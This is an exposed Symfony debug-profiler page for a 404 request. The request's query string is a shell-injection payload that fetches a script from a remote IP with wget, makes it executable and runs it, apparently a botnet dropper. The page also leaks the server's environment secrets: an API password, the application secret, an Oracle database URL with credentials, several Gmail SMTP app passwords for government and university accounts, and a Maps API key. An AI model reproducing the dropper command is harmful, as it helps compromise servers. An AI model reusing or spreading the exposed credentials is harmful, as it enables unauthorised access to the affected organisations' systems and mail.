http://200.4.140.227/shell?cd%20%2Ftmp%3Brm%20-rf%20j%3Bnohup%20wget%20http%3A%2F%5C%2F194.37.81.64%2Frandom.sh%3Bchmod%20777%20random.sh%3B.%2Frandom.sh=

Forwarded to
ErrorController (1e8c1b)
Method
GET
HTTP Status
404
IP
91.224.92.18
Profiled on
Token
85a2b8

n/a

Request

GET Parameters

Key Value
cd_/tmp;rm_-rf_j;nohup_wget_http:/\/194_37_81_64/random_sh;chmod_777_random_sh;_/random_sh 
""

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_remove_csp_headers 
true
_stopwatch_token 
"1f20ba"

Request Headers

Header Value
accept 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
accept-encoding 
"gzip, deflate"
accept-language 
"en-US,en;q=0.9"
cache-control 
"max-age=0"
connection 
"keep-alive"
content-length 
""
content-type 
""
host 
"200.4.140.227:80"
user-agent 
"KrebsOnSecurity"
x-php-ob-level 
"0"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Sat, 04 Jan 2025 04:41:57 GMT"
x-debug-exception 
"No%20route%20found%20for%20%22GET%20http%3A%2F%2F200.4.140.227%2Fshell%22"
x-debug-exception-file 
"%2Fwww%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token 
"85a2b8"
x-debug-token-link 
"http://200.4.140.227/_profiler/1e8c1b"
x-previous-debug-token 
"1e8c1b"
x-robots-tag 
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
API_PASS 
"V72YaThn"
API_URL 
"https://metqa.siged.sep.gob.mx/met-ws/services/TitulosElectronicos.wsdl"
API_USER 
"usuariomet.qa56"
APP_DEBUG 
"1"
APP_ENV 
"dev"
APP_SECRET 
"9421cde4672767ba92ee4048b2d945df"
DATABASE_URL 
"oci8://ADMCREDENCIAL:aDM3Cr3DeNc14L@10.10.30.250:1521/dbsiia?charset=AL32UTF8"
MAILER_DSN 
"gmail://rgnogueda@guerrero.gob.mx:hawpsavqvyymbglu@default?verify_peer=0"
MAILER_DSN_NMS 
"roundrobin(gmail+smtp://inscribe_superior2@uagro.mx:aziyoyycoaxldzfr@default gmail+smtp://inscribe_superior3@uagro.mx:padksdnjpwajodyf@default gmail+smtp://inscribe_medio1@uagro.mx:cvyhazzlhxxeoyix@default)"
MAILER_DSN_NS 
"roundrobin(gmail+smtp://inscribe_medio2@uagro.mx:aziyoyycoaxldzfr@default gmail+smtp://inscribe_medio3@uagro.mx:padksdnjpwajodyf@default gmail+smtp://inscribe_medio1@uagro.mx:cvyhazzlhxxeoyix@default)"
MAILER_FROM 
"rgnogueda@gmail.com"
MAPS_API_KEY 
"AIzaSyDUnncqPQAJlqUhdEoM8m2fPlV70cmWqos"
MESSENGER_TRANSPORT_DSN 
"doctrine://default"

Defined as regular env variables

Key Value
CONTENT_LENGTH 
""
CONTENT_TYPE 
""
DOCUMENT_ROOT 
"/www/public"
DOCUMENT_URI 
"/index.php//shell"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
GPG_KEYS 
"42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312"
HOME 
"/home/www-data"
HOSTNAME 
"a837044bba85"
HTTP_ACCEPT 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
HTTP_ACCEPT_ENCODING 
"gzip, deflate"
HTTP_ACCEPT_LANGUAGE 
"en-US,en;q=0.9"
HTTP_CACHE_CONTROL 
"max-age=0"
HTTP_CONNECTION 
"keep-alive"
HTTP_HOST 
"200.4.140.227:80"
HTTP_USER_AGENT 
"KrebsOnSecurity"
ORACLE_HOME 
"/usr/lib/oracle/21.1/client64/lib"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHPIZE_DEPS 
"autoconf \t\tdpkg-dev dpkg \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkgconf \t\tre2c"
PHP_ASC_URL 
"https://www.php.net/distributions/php-7.4.28.tar.xz.asc"
PHP_CFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_CPPFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_INI_DIR 
"/usr/local/etc/php"
PHP_LDFLAGS 
"-Wl,-O1 -pie"
PHP_SELF 
"/index.php"
PHP_SHA256 
"9cc3b6f6217b60582f78566b3814532c4b71d517876c25013ae51811e65d8fce"
PHP_URL 
"https://www.php.net/distributions/php-7.4.28.tar.xz"
PHP_VERSION 
"7.4.28"
PWD 
"/www"
QUERY_STRING 
"cd+/tmp;rm+-rf+j;nohup+wget+http:/\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh"
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"91.224.92.18"
REMOTE_PORT 
"59292"
REQUEST_METHOD 
"GET"
REQUEST_SCHEME 
"http"
REQUEST_TIME 
1735965717
REQUEST_TIME_FLOAT 
1735965717.5516
REQUEST_URI 
"/shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh"
SCRIPT_FILENAME 
"/www/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"172.18.0.2"
SERVER_NAME 
"localhost"
SERVER_PORT 
"80"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.20.2"
SHLVL 
"1"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_DEBUG,APP_SECRET,MAILER_FROM,MAPS_API_KEY,MAILER_DSN,MAILER_DSN_NMS,MAILER_DSN_NS,MESSENGER_TRANSPORT_DSN,API_URL,API_USER,API_PASS,DATABASE_URL"
USER 
"www-data"
argc 
8
argv 
[
  "cd"
  "/tmp;rm"
  "-rf"
  "j;nohup"
  "wget"
  "http:/\/194.37.81.64/random.sh;chmod"
  "777"
  "random.sh;./random.sh"
]

Sub Requests 1

ErrorController (token = 1e8c1b)

Key Value
_controller 
"error_controller"
_stopwatch_token 
"47e5d5"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#196
  -statusCode: 404
  -headers: []
  #message: "No route found for "GET http://200.4.140.227/shell""
  #code: 0
  #file: "/www/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#296 …}
  trace: {
    /www/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /www/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#356 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#452 …}
        }
      }
    }
    /www/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#356 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#452 …}
      }
    }
    /www/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …9]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#356 …}
      }
    }
    /www/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#356 …}
        $eventName: "kernel.request"
      }
    }
    /www/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#356 …}
        $eventName: "kernel.request"
      }
    }
    /www/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#4 …}
        $type: 1
      }
    }
    /www/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#4 …}
        $type: 1
        $catch: true
      }
    }
    /www/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#4 …}
      }
    }
    /www/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /www/public/index.php:5 {\rrequire_once dirname(__DIR__).'/vendor/autoload_runtime.php';\r\r
      arguments: {
        "/www/vendor/autoload_runtime.php"
      }
    }
  }
}
logger 
Symfony\Bridge\Monolog\Logger {#366 …9}